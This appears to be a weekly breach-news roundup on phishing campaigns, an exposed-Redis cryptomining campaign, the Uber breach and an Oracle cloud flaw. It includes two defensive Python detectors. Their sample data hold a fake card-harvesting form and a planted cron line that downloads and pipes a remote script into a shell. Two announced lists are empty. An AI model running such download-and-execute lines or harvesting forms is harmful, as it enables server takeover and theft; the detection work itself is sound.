Governments, businesses, and individuals can face serious consequences if they suffer a data breach, and a single overlooked vulnerability can expose sensitive information. Following is a summary of this week's breach-related news.
Netflix Threat Actors Stage a Credential Harvesting Heist
Over the past few years, Netflix customers have been warned about a series of phishing threats that share a common theme: credential harvesting. Cybercriminals send phishing emails to convince users that their Netflix account is in jeopardy and that they must update their credit card details to fix it.
INKY recently detected a PII harvesting campaign impersonating Netflix that delivers HTML attachments compressed inside zip files. The HTML attachment gives the attackers an advantage: the phishing page is rendered locally on the victim's machine rather than served from a web host, so there is no URL for reputation checks to inspect and the phishing content goes undetected.
How the attack happens
- In the campaign, the attackers spoofed all sender addresses to look like they came from Netflix's domain. The phishing emails were sent from a mail server controlled by a Peruvian university.
- Recipients were asked to resolve an account issue by downloading an attached form.
- The email carries a zip file that unpacks to an HTML attachment; when opened, it renders a form on the victim's machine that harvests personally identifiable information (credit card details, billing address, date of birth, etc.).
- Clicking “Agree and Continue” forwards the entered data to the attacker.
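Because the page never touches a web host, a mail gateway has to look inside the attachment itself. The following Python script is an added example of such a check, not INKY's tooling: it unpacks a zip in memory, parses any HTML members, and flags forms that post to a host outside the claimed sender domain or that ask for card and identity fields. The claimed domain, the PII field names and the sample attachment are constructed assumptions.

```python
import io
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

CLAIMED_DOMAIN = "netflix.com"  # assumed brand domain the mail claims to come from
# Assumed input names that a "billing update" harvesting form asks for.
PII_FIELDS = {"cardnumber", "card_number", "cvv", "expiry", "dob", "ssn", "password"}

class FormCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions, self.inputs = [], []  # <form action=...> targets and <input> names

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input":
            self.inputs.append((a.get("name") or a.get("id") or "").lower())

def inspect_zip_attachment(data: bytes, claimed_domain: str = CLAIMED_DOMAIN) -> dict:
    """Flag a zip attachment whose HTML members build a form posting off the claimed domain."""
    report = {"html_members": [], "external_form_actions": [], "pii_fields": [], "flag": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".htm", ".html")):
                continue
            report["html_members"].append(info.filename)
            parser = FormCollector()
            parser.feed(zf.read(info).decode("utf-8", "replace"))
            for action in parser.actions:
                host = (urlparse(action).hostname or "").lower()
                # A locally rendered form posting outside the claimed domain is the harvesting pattern.
                if host and host != claimed_domain and not host.endswith("." + claimed_domain):
                    report["external_form_actions"].append(action)
            report["pii_fields"] += [f for f in parser.inputs if f in PII_FIELDS]
    report["flag"] = bool(report["html_members"] and (report["external_form_actions"] or report["pii_fields"]))
    return report

def build_sample_zip() -> bytes:
    """Constructed sample: a zip holding an HTML 'billing form' that posts to a third-party host."""
    html = (b'<html><body><h1>Update your billing details</h1>'
            b'<form action="https://collector.example.net/submit" method="post"><input name="cardnumber">'
            b'<input name="cvv"><input name="dob"><button>Agree and Continue</button></form></body></html>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Netflix_Form.html", html)
    return buf.getvalue()
```

Nested archives and HTML members with non-standard extensions are not covered; a production filter would also recurse into inner zips and sniff content rather than trusting file names.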
Over 39k Unauthenticated and Internet-Exposed Redis Services Targeted in a Cryptocurrency Campaign
Redis is an open-source, in-memory data structure store used as a message broker, distributed database, or cache. It was not designed to be exposed to the Internet; nevertheless, researchers found many Redis instances that are publicly reachable and require no authentication.
Researcher Victor Zhu detailed the Redis unauthorized-access weakness that attackers could exploit to compromise Redis instances exposed online. “Under certain circumstances, if the Redis services run with the root account, attackers can write the root account’s SSH public key file and directly log in to the victim’s server. It allows threat actors to delete or steal data, gain server privileges, or execute encryption extortion, critically endangering normal operations.”
The researchers found evidence of an ongoing campaign in which threat actors abused several Redis keys prefixed with the string “backup” to write malicious crontab entries into the file “/var/spool/cron/root”. The crontab entries then fetch and execute a shell script hosted on a remote server.
The shell script:
- Disables and stops running security-related processes
- Disables and stops running system monitoring processes
- Removes and purges all security-related and system log files, including shell histories (e.g., .bash_history)
- Adds a new SSH key to the victim’s authorized_keys file
- Disables the iptables firewall
- Installs several scanning and hacking tools, such as “masscan”
- Installs and runs the crypto mining application XMRig
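A cron spool file written by Redis looks very different from one written by an administrator, which gives defenders a cheap host-level check. The following Python script is an added example, not part of the original research: it inspects the bytes of a cron spool file for an RDB dump header, key names with the “backup” prefix reported above, binary framing, and crontab lines that pipe a downloaded script into a shell. The sample spool content is constructed (RDB framing approximated, 198.51.100.7 is a documentation address).

```python
import re

# Cron spool files are plain text.  A Redis RDB dump written there through
# CONFIG SET dir/dbfilename + SAVE starts with this magic, e.g. b"REDIS0009".
RDB_MAGIC = b"REDIS"
# Key names reported in the campaign are prefixed with "backup" (backup1, backup2, ...).
BACKUP_KEY = re.compile(rb"backup\d*")
# Cron lines that fetch a remote script and pipe it straight into a shell.
REMOTE_EXEC = re.compile(rb"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b")
# Bytes that legitimately occur in a crontab: printable ASCII plus tab/LF/CR.
TEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}

def scan_cron_spool(content: bytes) -> dict:
    """Heuristic check that a cron spool file was planted through an exposed Redis."""
    findings = []
    if content.startswith(RDB_MAGIC):
        findings.append("rdb-header")
    if BACKUP_KEY.search(content):
        findings.append("backup-key-name")
    non_text = sum(1 for b in content if b not in TEXT_BYTES)
    if content and non_text / len(content) > 0.05:
        findings.append("binary-content")  # RDB framing around the planted line
    remote_exec = [ln.decode("latin-1").strip() for ln in content.split(b"\n") if REMOTE_EXEC.search(ln)]
    if remote_exec:
        findings.append("remote-script-exec")
    return {"findings": findings, "remote_exec_lines": remote_exec,
            "suspicious": "rdb-header" in findings or "remote-script-exec" in findings}

# Constructed sample of /var/spool/cron/root after an exposed Redis instance saved its
# dataset there (RDB framing approximated; 198.51.100.7 is a documentation address).
SAMPLE_SPOOL = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x07backup1\x3b"
    b"\n\n*/2 * * * * curl -fsSL http://198.51.100.7/init.sh | sh\n\n"
    b"\xff\x00\x00\x00\x00\x00\x00\x00\x00"
)
# Constructed benign spool file for comparison.
BENIGN_SPOOL = b"# m h dom mon dow command\n0 3 * * * /usr/local/bin/rotate-logs.sh\n"

if __name__ == "__main__":
    for name, data in (("sample", SAMPLE_SPOOL), ("benign", BENIGN_SPOOL)):
        print(name, scan_cron_spool(data))
```

The same check applies to any file an exposed Redis can be pointed at (authorized_keys, web roots); the RDB header and binary-content heuristics do not depend on the cron-specific line pattern.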
Hackers Steal Millions from Healthcare – Warns FBI
The FBI recently warned healthcare organizations to watch for cybercriminals who target payment processors and divert funds to attacker-controlled bank accounts. It added that bad actors have stolen over $4.6 million this year by compromising user accounts and altering payment information.
Cybercriminals’ dirty tricks:
- They use publicly available personal information and social engineering techniques to gain unauthorized access to victims’ websites, payment details, and healthcare portals.
- They also spoof support centers to gain access to companies that handle and deliver healthcare reimbursements.
- The threat actors alter Exchange Server configurations and create mailbox rules for targeted accounts so that copies of the victim’s messages are delivered to them.
Healthcare sector under attack
The healthcare sector has seen numerous cybercriminal assaults in the recent past:
- The Texas OakBend Medical Center suffered a ransomware attack that disrupted its communication and IT systems.
- HC3 noted that the Karakurt ransomware group carried out at least four cyberattacks affecting the U.S. public health and healthcare sectors since June.
- Russia-based Evil Corp targeted the U.S. healthcare sector to steal intellectual property, using tools like Dridex and other ransomware.
2-Step Email Attack Executes Payload Using Powtoon Video
According to a report, the attacks begin when the victim receives an email purporting to contain an invoice from the British email security firm Egress.
An Egress spokesperson said their investigation shows that the attack is a standard brand impersonation tactic. “As you know, cybercriminals leverage many well-known and trusted brands to give legitimacy to their malicious attacks. In the reported instance, the recipients got a phishing email using an Egress Protect (email encryption) template.”
The spokesperson added that Egress can assure users there is no evidence that Egress itself was the victim of a phishing attack, and dismissed as false all reports of account takeover attacks involving Egress employees or users. “The Egress customers or users need not take any action now.”
Once the user opens the fake Egress invoice, they are redirected to Powtoon, a legitimate video-sharing platform. The threat actors play a malicious video hosted on Powtoon that ends by presenting the user with a convincing fake Microsoft login page to harvest their credentials.
Fake Zoom Sites Deploy Vidar Malware
CRIL (Cyble Research and Intelligence Labs) recently discovered multiple fake Zoom sites designed to spread malware among Zoom users. The sites mimic Zoom’s user interface, and the malware is presented as Zoom’s legitimate application.
Details About the Malware
CRIL analyzed the malware and identified it as Vidar Stealer, an information stealer related to the Arkei stealer. Vidar steals the following information from an infected device:
- Banking Information
- Saved Passwords
- IP Addresses
- Browser history
- Login credentials
Following is a list of fake Zoom websites to avoid:
How the Vidar Malware Works
The deceptive sites redirect victims to a GitHub URL to download a malicious application which, upon execution, drops the following binaries in the temporary folder:
These files execute the cybercriminal’s code to steal information from the machine.
Oracle Cloud Infrastructure: Critical Vulnerability Allows Unauthorized Access
A recently discovered vulnerability in OCI (Oracle Cloud Infrastructure) allowed unauthorized access to other users’ cloud storage volumes, breaking cloud tenant isolation. The flaw, discovered by cloud security researchers at Wiz and dubbed AttachMe, is described in a new advisory the company published.
Oracle says it patched the flaw for all customers within 24 hours of being notified by Wiz. However, Elad Gabay, a senior software engineer at Wiz, said that before the patch an attacker could have used the vulnerability against any OCI user.
“The attacker might have read from or written to any attached or unattached storage volumes allowing multi-attachment provided he had its OCID (Oracle Cloud Identifier). Thus, it might have allowed exfiltration of sensitive data or initiation of destructive attacks by executable file manipulation.”
The Wiz advisory states that the potential attacks available to a hacker aware of the flaw included cross-tenant access and privilege escalation.
Uber Suffers Breach, Hackers Steal Vulnerability Reports
According to sources, a cyberattack forced Uber to shut down several engineering and internal communications systems. Uber confirmed that its internal systems were targeted in a data breach by a cybercriminal who claims to have access to Uber’s sensitive data. The company tweeted that it had informed law enforcement and is investigating the incident.
The threat actor provided screenshots of Uber’s IT systems, Slack server, Windows domain, and email dashboard, and may also have had access to Uber’s Google-hosted cloud infrastructure and Amazon Web Services dashboard.
According to a report by The New York Times, the attacker gained initial access by using social engineering against an Uber employee’s Slack account. With the stolen credentials, the attacker reached Uber’s internal systems containing confidential information. Uber did not confirm whether any customer data was compromised.
Microsoft 365 Phishing Attacks Spoof U.S. Govt Websites
An evolving phishing campaign targeting U.S. government contractors is expanding its operation with better-crafted documents and higher-quality lures. The emails invite recipients to bid on lucrative government projects and redirect victims to phishing pages that clone legitimate federal agency portals.
According to Cofense, the operators have expanded their targeting and now also spoof the Department of Commerce and the Department of Transportation. They are using a wider variety of lures in the messages, have removed grammatical errors and typos from the attached PDFs, and have improved the behavior of the phishing web pages.
The phishing emails, Cofense notes, now feature larger logos, more consistent formatting, and a link to the PDF instead of a file attachment. The phishing websites show targeted improvements as well, such as serving HTTPS on every site under the same domain.